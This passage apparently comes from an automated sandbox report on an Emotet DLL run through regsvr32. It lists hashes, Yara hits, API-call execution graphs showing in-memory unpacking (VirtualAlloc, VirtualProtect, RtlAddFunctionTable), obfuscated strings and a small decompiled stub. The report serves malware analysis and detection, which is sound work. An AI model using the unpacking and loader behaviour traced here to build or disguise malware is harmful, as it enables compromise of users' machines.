                                                                                                        Imagebase:0x7ff7e6980000
                                                                                                        File size:24064 bytes
                                                                                                        MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.435040931.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Target ID:8
                                                                                                        Start time:16:45:12
                                                                                                        Start date:17/03/2023
                                                                                                        Path:C:\Windows\System32\regsvr32.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DWxyui\KGQLMqgYfV.dll"
                                                                                                        Imagebase:0x7ff7e6980000
                                                                                                        File size:24064 bytes
                                                                                                        MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.617908467.0000000001220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000008.00000002.617622368.0000000001128000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.617991497.0000000002A51000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:8.5%
                                                                                                          Dynamic/Decrypted Code Coverage:8.9%
                                                                                                          Signature Coverage:7.1%
                                                                                                          Total number of Nodes:282
                                                                                                          Total number of Limit Nodes:8
                                                                                                          execution_graph 8532 c20000 8536 c2015a 8532->8536 8533 c2033f GetNativeSystemInfo 8534 c20377 VirtualAlloc 8533->8534 8541 c208eb 8533->8541 8535 c20395 VirtualAlloc 8534->8535 8537 c203aa 8534->8537 8535->8537 8536->8533 8536->8541 8538 c20873 8537->8538 8540 c2084b VirtualProtect 8537->8540 8539 c208c6 RtlAddFunctionTable 8538->8539 8538->8541 8539->8541 8540->8537 8542 c880cc 8543 c880f3 8542->8543 8544 c882ba 8543->8544 8546 c9e9e8 8543->8546 8549 c88bc8 8546->8549 8548 c9eab4 8548->8543 8551 c88c02 8549->8551 8550 c88eb8 8550->8548 8551->8550 8552 c88d6f Process32FirstW 8551->8552 8552->8551 8553 180001138 8554 180001141 __scrt_acquire_startup_lock 8553->8554 8556 180001145 8554->8556 8557 1800063cc 8554->8557 8558 1800063ec 8557->8558 8559 180006403 8557->8559 8560 1800063f4 8558->8560 8561 18000640a 8558->8561 8559->8556 8618 1800086f4 8560->8618 8588 180009cd8 8561->8588 8573 180006481 8575 1800086f4 __free_lconv_mon 11 API calls 8573->8575 8574 180006499 8576 1800061a4 47 API calls 8574->8576 8577 180006486 8575->8577 8581 1800064b5 8576->8581 8624 18000878c 8577->8624 8579 1800064bb 8580 18000878c __free_lconv_mon 11 API calls 8579->8580 8580->8559 8581->8579 8582 1800064e7 8581->8582 8583 180006500 8581->8583 8584 18000878c __free_lconv_mon 11 API calls 8582->8584 8585 18000878c __free_lconv_mon 11 API calls 8583->8585 8586 1800064f0 8584->8586 8585->8579 8587 18000878c __free_lconv_mon 11 API calls 8586->8587 8587->8559 8589 180009ce5 8588->8589 8593 18000640f 8588->8593 8630 180007e8c 8589->8630 8594 1800093bc GetModuleFileNameW 8593->8594 8595 180009401 GetLastError 8594->8595 8596 180009415 8594->8596 8988 180008668 8595->8988 8598 1800091fc 47 API calls 8596->8598 8600 180009443 8598->8600 8599 18000940e 8601 1800010b0 _log10_special 8 API calls 8599->8601 8605 180009454 8600->8605 8993 18000a5f0 8600->8993 8604 180006426 8601->8604 8606 1800061a4 8604->8606 8996 1800092a0 8605->8996 8608 1800061e2 8606->8608 8610 18000624e 8608->8610 9010 18000a088 8608->9010 8609 18000633f 8612 18000636c 8609->8612 8610->8609 8611 18000a088 47 API calls 8610->8611 8611->8610 8613 180006384 8612->8613 8617 1800063bc 8612->8617 8614 180008714 __free_lconv_mon 11 API calls 8613->8614 8613->8617 8615 1800063b2 8614->8615 8616 18000878c __free_lconv_mon 11 API calls 8615->8616 8616->8617 8617->8573 8617->8574 8619 180007f30 __free_lconv_mon 11 API calls 8618->8619 8620 1800063f9 8619->8620 8621 1800085b8 8620->8621 9014 180008450 8621->9014 8625 180008791 HeapFree 8624->8625 8626 1800087c0 8624->8626 8625->8626 8627 1800087ac GetLastError 8625->8627 8626->8559 8628 1800087b9 __free_lconv_mon 8627->8628 8629 1800086f4 __free_lconv_mon 9 API calls 8628->8629 8629->8626 8631 180007eb8 FlsSetValue 8630->8631 8632 180007e9d FlsGetValue 8630->8632 8634 180007eaa 8631->8634 8635 180007ec5 8631->8635 8633 180007eb2 8632->8633 8632->8634 8633->8631 8638 180007eb0 8634->8638 8685 180006e28 8634->8685 8673 180008714 8635->8673 8650 1800099b0 8638->8650 8641 180007ef2 FlsSetValue 8643 180007efe FlsSetValue 8641->8643 8644 180007f10 8641->8644 8642 180007ee2 FlsSetValue 8645 180007eeb 8642->8645 8643->8645 8680 180007b24 8644->8680 8647 18000878c __free_lconv_mon 11 API calls 8645->8647 8647->8634 8813 180009c20 8650->8813 8652 1800099e5 8828 1800096b0 8652->8828 8656 180009a13 8657 180009a1b 8656->8657 8660 180009a2a 8656->8660 8658 18000878c __free_lconv_mon 11 API calls 8657->8658 8659 180009a02 8658->8659 8659->8593 8660->8660 8842 180009d54 8660->8842 8663 180009b26 8664 1800086f4 __free_lconv_mon 11 API calls 8663->8664 8666 180009b2b 8664->8666 8665 180009b81 8668 180009be8 8665->8668 8853 1800094e0 8665->8853 8669 18000878c __free_lconv_mon 11 API calls 8666->8669 8667 180009b40 8667->8665 8670 18000878c __free_lconv_mon 11 API calls 8667->8670 8672 18000878c __free_lconv_mon 11 API calls 8668->8672 8669->8659 8670->8665 8672->8659 8678 180008725 __free_lconv_mon 8673->8678 8674 180008776 8677 1800086f4 __free_lconv_mon 10 API calls 8674->8677 8675 18000875a RtlAllocateHeap 8676 180007ed4 8675->8676 8675->8678 8676->8641 8676->8642 8677->8676 8678->8674 8678->8675 8694 18000abf8 8678->8694 8703 1800079fc 8680->8703 8717 18000acb8 8685->8717 8697 18000ac38 8694->8697 8702 180008160 EnterCriticalSection 8697->8702 8715 180008160 EnterCriticalSection 8703->8715 8751 18000ac70 8717->8751 8756 180008160 EnterCriticalSection 8751->8756 8814 180009c43 8813->8814 8816 180009c4d 8814->8816 8868 180008160 EnterCriticalSection 8814->8868 8817 180009cbf 8816->8817 8820 180006e28 __GetCurrentState 47 API calls 8816->8820 8817->8652 8821 180009cd7 8820->8821 8823 180009d2a 8821->8823 8825 180007e8c 52 API calls 8821->8825 8823->8652 8826 180009d14 8825->8826 8827 1800099b0 67 API calls 8826->8827 8827->8823 8869 1800091fc 8828->8869 8831 1800096e2 8833 1800096f7 8831->8833 8834 1800096e7 GetACP 8831->8834 8832 1800096d0 GetOEMCP 8832->8833 8833->8659 8835 18000b4c4 8833->8835 8834->8833 8836 18000b4d3 __free_lconv_mon 8835->8836 8837 18000b50f 8835->8837 8836->8837 8839 18000b4f6 HeapAlloc 8836->8839 8841 18000abf8 __free_lconv_mon 2 API calls 8836->8841 8838 1800086f4 __free_lconv_mon 11 API calls 8837->8838 8840 18000b50d 8838->8840 8839->8836 8839->8840 8840->8656 8841->8836 8843 1800096b0 49 API calls 8842->8843 8844 180009d81 8843->8844 8845 180009ed7 8844->8845 8847 180009dbe IsValidCodePage 8844->8847 8852 180009dd8 __GetCurrentState 8844->8852 8846 1800010b0 _log10_special 8 API calls 8845->8846 8848 180009b1d 8846->8848 8847->8845 8849 180009dcf 8847->8849 8848->8663 8848->8667 8850 180009dfe GetCPInfo 8849->8850 8849->8852 8850->8845 8850->8852 8901 1800097c8 8852->8901 8987 180008160 EnterCriticalSection 8853->8987 8870 180009220 8869->8870 8876 18000921b 8869->8876 8871 180007db8 __GetCurrentState 47 API calls 8870->8871 8870->8876 8872 18000923b 8871->8872 8877 18000b524 8872->8877 8876->8831 8876->8832 8878 18000b539 8877->8878 8879 18000925e 8877->8879 8878->8879 8885 18000bfb4 8878->8885 8881 18000b590 8879->8881 8882 18000b5a5 8881->8882 8883 18000b5b8 8881->8883 8882->8883 8898 180009d38 8882->8898 8883->8876 8886 180007db8 __GetCurrentState 47 API calls 8885->8886 8887 18000bfc3 8886->8887 8889 18000c00e 8887->8889 8897 180008160 EnterCriticalSection 8887->8897 8889->8879 8899 180007db8 __GetCurrentState 47 API calls 8898->8899 8900 180009d41 8899->8900 8902 180009805 GetCPInfo 8901->8902 8911 1800098fb 8901->8911 8903 180009818 8902->8903 8902->8911 8912 18000caa4 8903->8912 8904 1800010b0 _log10_special 8 API calls 8905 18000999a 8904->8905 8905->8845 8911->8904 8913 1800091fc 47 API calls 8912->8913 8914 18000cae6 8913->8914 8932 18000a0c4 8914->8932 8933 18000a0cd MultiByteToWideChar 8932->8933 8989 180007f30 __free_lconv_mon 11 API calls 8988->8989 8990 180008675 __free_lconv_mon 8989->8990 8991 180007f30 __free_lconv_mon 11 API calls 8990->8991 8992 180008697 8991->8992 8992->8599 8994 18000a3dc 5 API calls 8993->8994 8995 18000a610 8994->8995 8995->8605 8997 1800092df 8996->8997 8999 1800092c4 8996->8999 8998 1800092e4 8997->8998 9000 18000a154 WideCharToMultiByte 8997->9000 8998->8999 9002 1800086f4 __free_lconv_mon 11 API calls 8998->9002 8999->8599 9001 18000933b 9000->9001 9001->8998 9003 180009342 GetLastError 9001->9003 9004 18000936d 9001->9004 9002->8999 9005 180008668 11 API calls 9003->9005 9007 18000a154 WideCharToMultiByte 9004->9007 9006 18000934f 9005->9006 9008 1800086f4 __free_lconv_mon 11 API calls 9006->9008 9009 180009394 9007->9009 9008->8999 9009->8999 9009->9003 9011 18000a014 9010->9011 9012 1800091fc 47 API calls 9011->9012 9013 18000a038 9012->9013 9013->8608 9015 18000847b 9014->9015 9022 1800084ec 9015->9022 9018 1800084c5 9020 1800084da 9018->9020 9021 180006ef0 _invalid_parameter_noinfo 47 API calls 9018->9021 9020->8559 9021->9020 9047 180008234 9022->9047 9025 1800084a2 9025->9018 9032 180006ef0 9025->9032 9033 180006f48 9032->9033 9034 180006eff GetLastError 9032->9034 9033->9018 9035 180006f14 9034->9035 9036 180007ff8 _invalid_parameter_noinfo 16 API calls 9035->9036 9037 180006f2e SetLastError 9036->9037 9037->9033 9038 180006f51 9037->9038 9039 180006e28 __GetCurrentState 45 API calls 9038->9039 9040 180006f56 9039->9040 9041 180006ef0 _invalid_parameter_noinfo 45 API calls 9040->9041 9042 180006f77 9041->9042 9077 18000b558 9042->9077 9048 18000828b 9047->9048 9049 180008250 GetLastError 9047->9049 9048->9025 9053 1800082a0 9048->9053 9050 180008260 9049->9050 9060 180007ff8 9050->9060 9054 1800082d4 9053->9054 9055 1800082bc GetLastError SetLastError 9053->9055 9054->9025 9056 1800085d8 IsProcessorFeaturePresent 9054->9056 9055->9054 9057 1800085eb 9056->9057 9058 1800082ec __GetCurrentState 14 API calls 9057->9058 9059 180008606 GetCurrentProcess TerminateProcess 9058->9059 9061 180008032 FlsSetValue 9060->9061 9062 180008017 FlsGetValue 9060->9062 9064 18000803f 9061->9064 9074 180008024 SetLastError 9061->9074 9063 18000802c 9062->9063 9062->9074 9063->9061 9065 180008714 __free_lconv_mon 11 API calls 9064->9065 9066 18000804e 9065->9066 9067 18000806c FlsSetValue 9066->9067 9068 18000805c FlsSetValue 9066->9068 9070 180008078 FlsSetValue 9067->9070 9071 18000808a 9067->9071 9069 180008065 9068->9069 9072 18000878c __free_lconv_mon 11 API calls 9069->9072 9070->9069 9073 180007b24 __free_lconv_mon 11 API calls 9071->9073 9072->9074 9075 180008092 9073->9075 9074->9048 9076 18000878c __free_lconv_mon 11 API calls 9075->9076 9076->9074 9078 18000b571 9077->9078 9080 180006f9f 9077->9080 9079 18000bfb4 _invalid_parameter_noinfo 47 API calls 9078->9079 9078->9080 9079->9080 9081 18000b5c4 9080->9081 9082 180006faf 9081->9082 9083 18000b5dd 9081->9083 9082->9018 9083->9082 9084 180009d38 _invalid_parameter_noinfo 47 API calls 9083->9084 9084->9082 9085 180010a8e ExitProcess 9088 180014c90 LoadStringW LoadStringW 9085->9088 9097 1800109d0 LoadCursorW RegisterClassExW 9088->9097 9090 180014cec 9098 180010910 CreateWindowExW 9090->9098 9092 180014d02 GetMessageW 9093 180010ab3 9092->9093 9094 180014d19 TranslateAcceleratorW 9092->9094 9095 180014cfa 9094->9095 9096 180014d2f TranslateMessage DispatchMessageW 9094->9096 9095->9092 9095->9093 9096->9095 9097->9090 9099 1800109a1 ShowWindow UpdateWindow 9098->9099 9100 18001099d 9098->9100 9099->9100 9100->9095 9101 c84214 9102 c84256 9101->9102 9105 c93988 9102->9105 9104 c844c6 9106 c93a29 9105->9106 9107 c93acc CreateProcessW 9106->9107 9107->9104

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 c20000-c2029a call c2091c * 2 13 c202a0-c202a4 0->13 14 c20905 0->14 13->14 16 c202aa-c202ae 13->16 15 c20907-c2091a 14->15 16->14 17 c202b4-c202b8 16->17 17->14 18 c202be-c202c5 17->18 18->14 19 c202cb-c202dc 18->19 19->14 20 c202e2-c202eb 19->20 20->14 21 c202f1-c202fc 20->21 21->14 22 c20302-c20312 21->22 23 c20314-c2031a 22->23 24 c2033f-c20371 GetNativeSystemInfo 22->24 26 c2031c-c20324 23->26 24->14 25 c20377-c20393 VirtualAlloc 24->25 27 c20395-c203a8 VirtualAlloc 25->27 28 c203aa-c203ae 25->28 29 c20326-c2032a 26->29 30 c2032c-c2032d 26->30 27->28 32 c203b0-c203c2 28->32 33 c203dc-c203e3 28->33 31 c2032f-c2033d 29->31 30->31 31->24 31->26 34 c203d4-c203d8 32->34 35 c203e5-c203f9 33->35 36 c203fb-c20417 33->36 37 c203c4-c203d1 34->37 38 c203da 34->38 35->35 35->36 39 c20458-c20465 36->39 40 c20419-c2041a 36->40 37->34 38->36 41 c20537-c20542 39->41 42 c2046b-c20472 39->42 43 c2041c-c20422 40->43 44 c206e6-c206ed 41->44 45 c20548-c20559 41->45 42->41 46 c20478-c20485 42->46 47 c20424-c20446 43->47 48 c20448-c20456 43->48 51 c206f3-c20707 44->51 52 c207ac-c207c3 44->52 49 c20562-c20565 45->49 46->41 50 c2048b-c2048f 46->50 47->47 47->48 48->39 48->43 53 c20567-c20574 49->53 54 c2055b-c2055f 49->54 55 c2051b-c20525 50->55 56 c207a9-c207aa 51->56 57 c2070d 51->57 58 c2087a-c2088d 52->58 59 c207c9-c207cd 52->59 62 c2057a-c2057d 53->62 63 c2060d-c20619 53->63 54->49 60 c20494-c204a8 55->60 61 c2052b-c20531 55->61 56->52 64 c20712-c20736 57->64 80 c208b3-c208ba 58->80 81 c2088f-c2089a 58->81 65 c207d0-c207d3 59->65 66 c204aa-c204cd 60->66 67 c204cf-c204d3 60->67 61->41 61->50 62->63 68 c20583-c2059b 62->68 72 c206e2-c206e3 63->72 73 c2061f 63->73 89 c20796-c2079f 64->89 90 c20738-c2073e 64->90 70 c207d9-c207e9 65->70 71 c2085f-c2086d 65->71 75 c20518-c20519 66->75 76 c204e3-c204e7 67->76 77 c204d5-c204e1 67->77 68->63 78 c2059d-c2059e 68->78 82 c207eb-c207ed 70->82 83 c2080d-c2080f 70->83 71->65 74 c20873-c20874 71->74 72->44 84 c20625-c20648 73->84 74->58 75->55 87 c204e9-c204fc 76->87 88 c204fe-c20502 76->88 85 c20511-c20515 77->85 86 c205a0-c20605 78->86 94 c208eb-c20903 80->94 95 c208bc-c208c4 80->95 91 c208ab-c208b1 81->91 92 c207fb-c2080b 82->92 93 c207ef-c207f9 82->93 96 c20822-c2082b 83->96 97 c20811-c20820 83->97 107 c206b2-c206b7 84->107 108 c2064a-c2064b 84->108 85->75 86->86 99 c20607 86->99 87->85 88->75 106 c20504-c2050e 88->106 89->64 105 c207a5-c207a6 89->105 100 c20740-c20746 90->100 101 c20748-c20754 90->101 91->80 102 c2089c-c208a8 91->102 98 c2082e-c2083d 92->98 93->98 94->15 95->94 104 c208c6-c208e9 RtlAddFunctionTable 95->104 96->98 97->98 109 c2084b-c2085c VirtualProtect 98->109 110 c2083f-c20845 98->110 99->63 112 c2077b-c2078d 100->112 113 c20756-c20757 101->113 114 c20764-c20776 101->114 102->91 104->94 105->56 106->85 118 c206b9-c206bd 107->118 119 c206ce-c206d8 107->119 117 c2064e-c20651 108->117 109->71 110->109 112->89 126 c2078f-c20794 112->126 116 c20759-c20762 113->116 114->112 116->114 116->116 120 c20653-c20659 117->120 121 c2065b-c20666 117->121 118->119 124 c206bf-c206c3 118->124 119->84 123 c206de-c206df 119->123 125 c2068d-c206a3 120->125 127 c20676-c20688 121->127 128 c20668-c20669 121->128 123->72 124->119 129 c206c5 124->129 132 c206a5-c206aa 125->132 133 c206ac 125->133 126->90 127->125 130 c2066b-c20674 128->130 129->119 130->127 130->130 132->117 133->107
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435033213.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c20000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                          • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                          • API String ID: 394283112-3605381585
                                                                                                          • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                          • Instruction ID: 67b06c5aa51e8499af8920f3f8b88880698457fe6efb6411bdf370eca22be596
                                                                                                          • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                          • Instruction Fuzzy Hash: 8B521630618B588BC719DF18E8857BAB7F1FB54304F24462EE89BC7652DB34E542CB86
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                                          • API String ID: 0-383957222
                                                                                                          • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                          • Instruction ID: 07a1cb356b6f311efe181b47aa8d864c12ace5bbe4eb46d3221ae673b7764c82
                                                                                                          • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                          • Instruction Fuzzy Hash: 1BC1CD71519780AFD388CF28C58A91BBBF0FBD4758F906A1DF89686260D7B4D909CF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                          • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                                          • API String ID: 2485490239-3005932707
                                                                                                          • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                          • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                                          • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                          • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 260 c87d6c-c87d9a 261 c87d9c-c87da4 260->261 262 c8804a-c880a9 call c9a474 261->262 263 c87daa-c87dad 261->263 271 c880ab-c880b0 262->271 272 c880b5 262->272 265 c87db3-c87db9 263->265 266 c87ff4-c88045 call c96048 263->266 268 c87dbf-c87dc5 265->268 269 c87f53-c87fef call c9fdcc 265->269 266->261 273 c880ba-c880c0 268->273 274 c87dcb-c87ec1 call c9bb78 268->274 269->261 271->261 272->273 278 c87f40-c87f52 273->278 279 c880c6 273->279 281 c87ec6-c87ecc 274->281 279->261 282 c87ece-c87ed5 281->282 283 c87edf-c87f3b call c98f30 281->283 282->283 283->278
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                                          • API String ID: 0-308291206
                                                                                                          • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                          • Instruction ID: d1ca6ae6f95a773d67582c05476cd769b56809ad0d5e856491a062832e678769
                                                                                                          • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                          • Instruction Fuzzy Hash: D4914A7150074A8BDF48DF28C88A5DE3FA0FB58358F65422DEC4AA6290D778D695CBC8
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 285 c9a000-c9a0cc call c99f38 call c92404 290 c9a22c-c9a243 285->290 291 c9a0d2-c9a16a call c99424 285->291 293 c9a16f-c9a227 call c9c2c0 291->293 293->290
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: /Q$;$F8$KT$F$Z
                                                                                                          • API String ID: 0-1951868783
                                                                                                          • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                          • Instruction ID: c1a0800a56f7757de17d8eb42ef3f6c04a2a5fd2bf618eaf762842297e3cdc80
                                                                                                          • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                          • Instruction Fuzzy Hash: 116134B0E107098FCB48CFA8D88A8DEBBB1FB58314F10821DE846A7290D7749995CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 37%
                                                                                                          			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                          				long long _v32;
                                                                                                          				long long _v40;
                                                                                                          				intOrPtr _v48;
                                                                                                          				intOrPtr _v52;
                                                                                                          				intOrPtr _v56;
                                                                                                          				intOrPtr _t15;
                                                                                                          				long long _t19;
                                                                                                          				long long _t20;
                                                                                                          
                                                                                                          				_a24 = _t20;
                                                                                                          				_a16 = _t15;
                                                                                                          				_a8 = _t19;
                                                                                                          				_v56 = _a16;
                                                                                                          				if (_v56 == 1) goto 0x80010ae6;
                                                                                                          				goto 0x80010bf4;
                                                                                                          				 *0x80022ca0 = _a8;
                                                                                                          				_v52 = 0x904;
                                                                                                          				_v48 = 0xf9e;
                                                                                                          				_v40 = 0;
                                                                                                          				_v32 = 0;
                                                                                                          				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
                                                                                                          				ExitProcess(??);
                                                                                                          			}











                                                                                                          0x180010ac0
                                                                                                          0x180010ac5
                                                                                                          0x180010ac9
                                                                                                          0x180010ad6
                                                                                                          0x180010adf
                                                                                                          0x180010ae1
                                                                                                          0x180010aeb
                                                                                                          0x180010af2
                                                                                                          0x180010afa
                                                                                                          0x180010b02
                                                                                                          0x180010b0b
                                                                                                          0x180010b1b
                                                                                                          0x180010b22

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 621844428-0
                                                                                                          • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                          • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                                          • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                          • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 309 c8cc14-c8cc36 310 c8cc40 309->310 311 c8cc42-c8cc48 310->311 312 c8cfbb-c8d136 call ca826c call c81718 311->312 313 c8cc4e-c8cc54 311->313 326 c8d138 312->326 327 c8d13d-c8d314 call c81718 call ca1ac4 312->327 315 c8cc5a-c8cc60 313->315 316 c8cfb1-c8cfb6 313->316 318 c8d31f-c8d325 315->318 319 c8cc66-c8cc73 315->319 316->311 318->311 320 c8d32b-c8d338 318->320 322 c8ccb0-c8cccb 319->322 323 c8cc75-c8ccae 319->323 325 c8ccd5-c8cf8f call c88870 call c81718 call ca1ac4 322->325 323->325 339 c8cf94-c8cf9c 325->339 326->327 327->310 337 c8d31a 327->337 337->318 339->320 340 c8cfa2-c8cfac 339->340
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0c$\$c2&
                                                                                                          • API String ID: 0-1001447681
                                                                                                          • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                          • Instruction ID: 88b108e70b4f6818d7601e049de9d21eb91694ba533bf29b9926179059a28712
                                                                                                          • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                          • Instruction Fuzzy Hash: 7202E7711083C88BEBBEDF64C8896DA7BADFB44708F10521DEE0A9E298DB745744CB41
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
